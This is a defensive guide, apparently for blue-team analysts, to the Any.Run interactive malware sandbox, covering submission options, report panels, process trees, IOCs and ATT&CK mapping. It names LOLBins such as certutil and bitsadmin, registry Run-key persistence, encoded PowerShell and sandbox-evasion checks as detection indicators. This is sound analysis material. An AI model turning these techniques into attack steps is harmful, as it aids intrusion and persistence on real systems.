// What is Any.Run?
Any.Run is an interactive online malware sandbox. Unlike automated sandboxes that run a sample and generate a report, Any.Run gives you a live virtual machine in your browser where you can interact with the malware in real time � click through installers, open documents, observe what happens when you take specific actions.
It's an invaluable tool for blue team analysts and DFIR responders who need to quickly understand what a suspicious file or URL does without exposing a real system to risk.
Any.Run has a free public tier where submissions and reports are publicly visible. If you're analysing sensitive files (internal documents, corporate malware samples), use a private submission � this requires a paid account. Never submit files containing sensitive company or personal data on the free tier.
// Sandbox Concepts
Isolation
The sample runs in a disposable VM with no connection to real systems. Network traffic is intercepted for analysis rather than routing to the actual internet (unless you enable real network access).
Instrumentation
Every system call, process spawn, network connection, file write, and registry change is monitored and recorded � giving you complete visibility into what the sample does.
Interactivity
Unlike automated sandboxes, Any.Run lets you interact with the VM � open files, click buttons, enter credentials. Malware that waits for user interaction or checks for VM environment can be triggered manually.
Time limit
Free sessions run for 60 seconds. Paid plans extend to several minutes. Some malware has long sleep timers � use the time slider to advance the analysis if activity stalls.
// Submitting Samples
Any.Run accepts files (EXE, DLL, DOC, PDF, ZIP, etc.) and URLs. Key options when submitting:
| Option | Description | When to use |
|---|---|---|
| OS Version | Windows 7, 10, 11 � select to match target environment | Match the OS of the victim host when analysing an incident |
| Bitness | 32-bit or 64-bit | Match the victim architecture � some malware checks this |
| Real network | Routes traffic to actual internet instead of simulated | Needed if C2 infrastructure is live and you want to see real callbacks |
| Fake net | Simulates network responses � keeps malware running even when C2 is down | Useful for analysing malware when C2 is offline |
| Privacy | Public (free) or Private (paid) | Always use Private for real incident samples |
| Run as admin | Starts the sample with administrator privileges | When malware requires elevated privileges to run |
| MITM | Intercepts HTTPS traffic for decryption | When malware uses HTTPS C2 and you want to see request contents |
Before submitting, search the Any.Run public task database for the file hash first. If someone has already analysed the same sample, you can review their report instantly without spending a submission.
// Reading the Report
The Any.Run report has several panels � understanding each one helps you quickly extract the information you need.
| Panel | What it shows |
|---|---|
| Process Graph | Visual tree of all spawned processes � the most important view for understanding execution chain |
| Network Activity | DNS queries, HTTP requests, connections � shows C2 callbacks, payload downloads, exfiltration |
| File Activity | Files created, modified, or deleted � dropped payloads, configuration files, ransom notes |
| Registry Activity | Registry keys read or written � persistence mechanisms, configuration storage |
| Threats | Any.Run's verdict and tagged signatures � malware family, MITRE techniques |
| IOCs | Extracted indicators � IPs, domains, hashes, file paths � exportable for threat hunting |
| Suricata Alerts | Network IDS hits � known malware traffic patterns matched against Suricata rules |
// Process Tree Analysis
The process tree is the heart of the analysis. It shows every process that ran during the session, their parent-child relationships, and tags suspicious activity inline.
What to look for
Suspicious parent-child
Office applications spawning cmd.exe or powershell.exe � classic macro or exploit indicator. Browser spawning wscript.exe � drive-by download.
Process injection
Malware code running inside a legitimate process (e.g. code inside explorer.exe or svchost.exe making network connections it normally wouldn't). Look for activity that doesn't match the process name.
LOLBins
Living-off-the-land binaries � certutil, regsvr32, mshta, bitsadmin, rundll32 used with unusual arguments to download or execute payloads.
Privilege escalation
Processes starting as a standard user and later appearing with SYSTEM or elevated context � look for UAC bypass attempts or token manipulation.
Colour coding in the process tree
| Colour | Meaning |
|---|---|
| Red | Process flagged as malicious � confirmed or highly suspicious activity |
| Orange | Suspicious � potentially malicious behaviour detected |
| Yellow | Informational � notable behaviour but not necessarily malicious |
| Grey | Clean / system process |
// Network Activity
The Network tab shows all DNS queries, HTTP/HTTPS requests, and raw TCP/UDP connections made during the session.
Key things to extract
| Type | What to look for |
|---|---|
| DNS queries | C2 domain names � look for DGA-style random strings, recently registered domains, or known malicious domains |
| HTTP GET | Payload download URLs � note the path and any query parameters (often contain victim ID or encoded data) |
| HTTP POST | Data being sent out � check request body for stolen credentials, system info, or encoded exfiltrated data |
| User-Agent | Often hardcoded in malware � note the exact string for detection rules |
| Beaconing pattern | Regular intervals of identical requests � note the interval and URL for C2 detection |
| IP addresses | Direct IP connections (no DNS) are suspicious � often C2 infrastructure avoiding domain-based blocking |
// File System Activity
Every file created, modified, renamed, or deleted during execution is logged. This reveals:
Dropped payloads
Second-stage executables written to disk � note the path and hash. Common drop locations: %TEMP%, %APPDATA%, C:\ProgramData.
Config files
Malware often writes configuration to disk � RC4 keys, C2 addresses, victim identifiers. These files may be encrypted or obfuscated.
Persistence files
Files written to startup folders (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup), or copies of the malware in system directories.
Ransomware
Bulk file modification followed by new extensions (.locked, .enc) and ransom note files appearing. Ransom notes contain C2 contact details.
// IOC Extraction
Any.Run's IOC tab compiles all indicators of compromise from the session into a single exportable list. Key IOC types:
| IOC type | How to use it |
|---|---|
| File hashes (MD5, SHA-1, SHA-256) | Block in EDR/AV; search in SIEM for historical matches; submit to VirusTotal |
| IP addresses | Block at firewall; search in SIEM for connections; check reputation in threat intel |
| Domains | Block at DNS/proxy; search SIEM DNS logs; check registration date and WHOIS |
| URLs | Block at web proxy; search proxy logs; may contain unique campaign identifiers |
| File paths | Hunt for the same paths on other endpoints in your environment |
| Registry keys | Hunt for the same persistence keys across endpoints |
| Mutex names | Mutexes are created by malware to prevent re-infection � unique per malware family, useful for detection rules |
Export IOCs in MISP, JSON, or plain text format from the Any.Run report. Import them directly into your SIEM, SOAR, or threat intel platform to automate hunting across your environment.
// MITRE ATT&CK Mapping
Any.Run automatically tags observed behaviours with MITRE ATT&CK techniques. This is invaluable for incident reporting and for understanding attacker intent.
Common techniques seen in sandbox analysis
| Technique ID | Name | What it looks like in Any.Run |
|---|---|---|
| T1059.001 | PowerShell | PowerShell spawned, often with -enc flag � encoded command execution |
| T1059.003 | Windows Command Shell | cmd.exe with unusual arguments or spawned from document process |
| T1055 | Process Injection | Malicious code executing inside a legitimate host process |
| T1547.001 | Registry Run Keys | HKCU\Software\Microsoft\Windows\CurrentVersion\Run modified |
| T1053.005 | Scheduled Task | schtasks.exe run with /create argument |
| T1071.001 | Web Protocols (C2) | HTTP/HTTPS to unusual domain after execution |
| T1486 | Data Encrypted for Impact | Bulk file modification with new extensions � ransomware |
| T1562.001 | Disable Security Tools | AV/EDR services stopped; Windows Defender disabled via registry |
// Tips & Best Practices
Interact with the sample. Any.Run's biggest advantage over automated sandboxes is interactivity. If a sample opens a document, click Enable Content. If it shows a password prompt, try common passwords. If it waits for input, provide it � malware often gates further activity behind user interaction.
Use fake network mode for offline C2. If the malware's C2 server is down, it may exit quickly or loop waiting for a connection. Enable Fake Net to simulate network responses � this keeps the malware running so you can observe more behaviour.
Cross-reference with VirusTotal. Once you have file hashes from the analysis, submit them to VirusTotal for additional vendor coverage. Any.Run shows behavioural analysis; VirusTotal shows signature-based detection rates across 70+ engines.
Malware can detect sandboxes. Some malware checks for VM artefacts (CPUID, registry keys, process names, screen resolution) and behaves differently or exits. Any.Run has some anti-evasion options, but sophisticated malware may still detect the environment. In those cases, consider using a private bare-metal environment.